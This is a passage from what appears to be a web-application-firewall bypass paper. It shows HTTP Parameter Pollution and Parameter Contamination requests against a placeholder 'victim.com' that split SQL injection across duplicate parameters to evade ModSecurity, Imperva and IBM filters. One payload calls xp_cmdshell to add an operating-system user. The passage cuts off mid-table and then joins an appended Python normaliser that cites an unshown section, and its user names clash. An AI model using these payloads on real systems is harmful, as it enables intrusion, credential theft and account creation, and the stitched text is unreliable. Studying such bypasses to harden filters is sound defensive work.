+-------------+------------------------------+-----------------+

What would happen with WAFs that parse the query string before applying filters? (HPP can be used even to bypass WAFs.)
Some loose WAFs may analyze and validate a single parameter occurrence only (the first or the last one). Whenever the real environment concatenates
multiple occurrences (ASP, ASP.NET, DBMan, …) an attacker can split the malicious payload.

In a recent penetration test (again), we were able to bypass an Imperva SecureSphere using "HPP+Inline Comment" in an ASP/ASP.NET environment.
This technique can bypass other commercial WAFs too. More information about "HPP+Inline Comment" is shown below:


#Real World Example:

1. Mod Security CRS (Credit: Lavakumar Kuppan)

The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.

Forbidden: http://victim.com/search.aspx?q=select name,password from users

When the same payload is split across multiple parameters of the same name, ModSecurity fails to block it.

Bypassed : http://victim.com/search.aspx?q=select name&q=password from users


Let's see what happens. ModSecurity's interpretation is:

q=select name
q=password from users

ASP/ASP.NET's interpretation is:
q=select name,password from users

*Tip: This attack can be carried out on a POST variable in a similar way.


2. Commercial WAFs

Forbidden: http://victim.com/search.aspx?q=select name,password from users

Now we use HPP+Inline Comment to bypass it.

Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users


Analyzing, the WAF's interpretation is:

q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/users

ASP/ASP.NET's interpretation is:
q=select/*,*/name,password/*,*/from/*,*/users
q=select name,password from users


3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)

Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell "net user zeq3ul UrWaFisShiT /add" --

Now we use HPP+Inline Comment to bypass it.

Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --


Analyzing, the WAF's interpretation is:

id=1'; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ "net user zeq3ul UrWaFisShiT" /*
id=1*/ --

ASP/ASP.NET's interpretation is:
id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user zeq3ul UrWaFisShiT" /*,1*/ --
id=1'; EXEC master..xp_cmdshell "net user zeq3ul UrWaFisShiT" --


The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request.
This would prevent all variations of this attack.
However, this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters,
and they might be designed to send and accept multiple HTTP parameters of the same name in the same request. To protect these applications the WAF
should also interpret the HTTP request in the same way the web application would.


++++++++++++++++++++++++++++++++++++++++
[0x03b] - HTTP Parameter Contamination
++++++++++++++++++++++++++++++++++++++++

The original idea of HTTP Parameter Contamination (HPC) comes from the innovative approach found in HPP research, taken deeper:
exploring and exploiting strange behaviors in web server components, web applications and browsers that result from contaminating
query string parameters with reserved or unexpected characters.

Some facts:
- The term Query String is commonly used to refer to the part between the "?" and the end of the URI
- As defined in RFC 3986, it is a series of field-value pairs
- Pairs are separated by "&" or ";"
- RFC 2396 defines two classes of characters:
    Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
    Reserved  : ; / ? : @ & = + $ ,
    Unwise    : { } | \ ^ [ ] `

Different web servers have different logic for processing specially crafted requests. There are more web server, backend platform and special character combinations,
but we will stop here this time.

Query string and Web server response (Example)

+--------------+--------------------------+------------+
| Query String | Web Server response / GET values      |
|              +--------------------------+------------+
|              | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP   |
+--------------+--------------------------+------------+
| ?test[1=2    | test_1=2                 | test[1=2   |
| ?test=%      | test=%                   | test=      |
| ?test%00=1   | test=1                   | test=1     |
| ?test=1%001  | NULL                     | test=1     |
| ?test+d=1+2  | test_d=1 2               | test d=1 2 |
+--------------+--------------------------+------------+

The magic character "%" affects ASP/ASP.NET

+-------------------+-------------------+-----------------+
| Keywords          | WAF               | ASP/ASP.NET     |
+-------------------+-------------------+-----------------+
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
|                   |                   |
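Tying together sections [0x02] (comment handling), [0x03a] (HPP) and [0x03b] (HPC), here is an added example, not code from the original text or from any WAF it names, of a WAF-side normaliser written the way the HPP mitigation above recommends: rebuild each parameter the way the backend will (duplicate handling per server from the HTTP Parameter Handling table, the stray "%" drop from the ASP/ASP.NET table), then strip comments in MySQL lexer order before matching. The server models and function names are simplified assumptions of this example, and the inputs in the comments are the page's own payloads.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not from the original text: a WAF-side normaliser that rebuilds
# a parameter the way the backend will see it (duplicate handling per server and
# IIS/ASP dropping a stray '%', both from the tables above), then strips comments
# in MySQL lexer order before matching.  Server models are simplified assumptions.

def split_query(query):
    """Raw (name, value) pairs of a query string; '&' and ';' both separate pairs."""
    parts = [p.partition("=") for p in re.split(r"[&;]", query.lstrip("?")) if p]
    return [(name, value) for name, _, value in parts]

def decode(raw, server):
    """Single URL-decode; IIS/ASP drops a '%' not followed by two hex digits."""
    if server.startswith("asp"):
        raw = re.sub(r"%(?![0-9A-Fa-f]{2})", "", raw)     # sele%ct -> select
    return unquote_to_bytes(raw.replace("+", " ")).decode("latin-1")

def backend_value(query, name, server):
    """What the backend assigns to `name` after decoding and merging duplicates."""
    values = [decode(v, server) for n, v in split_query(query) if n == name]
    if not values:
        return None
    if server.startswith("asp"):
        return ",".join(values)        # ASP/ASP.NET: concatenation by comma
    if server == "php":
        return values[-1]              # PHP/Apache: last occurrence wins
    return values[0]                   # JSP/Tomcat, Perl/Apache: first wins

def duplicate_params(query):
    """Names occurring more than once: the simplest HPP mitigation named above."""
    names = [n for n, _ in split_query(query)]
    return sorted({n for n in names if names.count(n) > 1})

def mysql_normalize(sql):
    """Strip comments in MySQL lexer order, left to right: '#' and '-- ' run to end
    of line, '/* */' becomes a space, '/*! */' keeps its body (MySQL executes it).
    Then lowercase and collapse whitespace."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] == "#" or sql.startswith("-- ", i):
            i = sql.find("\n", i) if "\n" in sql[i:] else n
        elif sql.startswith("/*", i):
            body_at = i + 3 if sql.startswith("/*!", i) else i + 2
            end = sql.find("*/", body_at)
            body = sql[body_at:(end if end >= 0 else n)] if body_at == i + 3 else ""
            out.append(" " + body + " ")
            i = n if end < 0 else end + 2
        else:
            out.append(sql[i])
            i += 1
    return " ".join("".join(out).lower().split())

def naive_normalize(sql):
    """C-comment-only stripping (an unterminated '/*' runs to the end) that knows
    nothing about '#' line comments: the mismatch the CRS example above exploits."""
    return " ".join(re.sub(r"/\*.*?(?:\*/|\Z)", " ", sql, flags=re.S).lower().split())

UNION_SELECT = re.compile(r"\bunion\b.{0,100}?\bselect\b")

def union_select_seen(query, name, server, normalize=mysql_normalize):
    """True when the normalised backend view of `name` contains UNION ... SELECT."""
    value = backend_value(query, name, server)
    return value is not None and UNION_SELECT.search(normalize(value)) is not None
```

With the CRS request from section [0x02] the MySQL-order normaliser yields "0 div 1 union select 1,2,current_user" while the C-comment-only one does not, and the split HPP request reassembles to "select name,password from users" under the ASP model.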